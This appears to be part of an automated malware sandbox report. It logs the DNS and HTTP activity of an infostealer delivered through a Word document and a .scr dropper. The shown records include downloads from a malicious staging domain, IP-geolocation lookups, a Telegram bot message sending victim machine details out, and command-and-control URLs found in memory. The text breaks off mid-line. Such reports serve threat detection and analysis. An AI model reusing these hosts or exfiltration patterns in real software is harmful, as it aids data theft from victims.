                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeDNS query: name: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /swagodi.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: meridianresourcellc.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /swagodi.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: meridianresourcellc.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FA22C98-7DA0-493A-91D1-4967A9EB7810}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /swagodi.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: meridianresourcellc.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /swagodi.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: meridianresourcellc.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: meridianresourcellc.top
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 21:45:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 21:45:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgX
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comX
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000248D000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002465000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/X
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 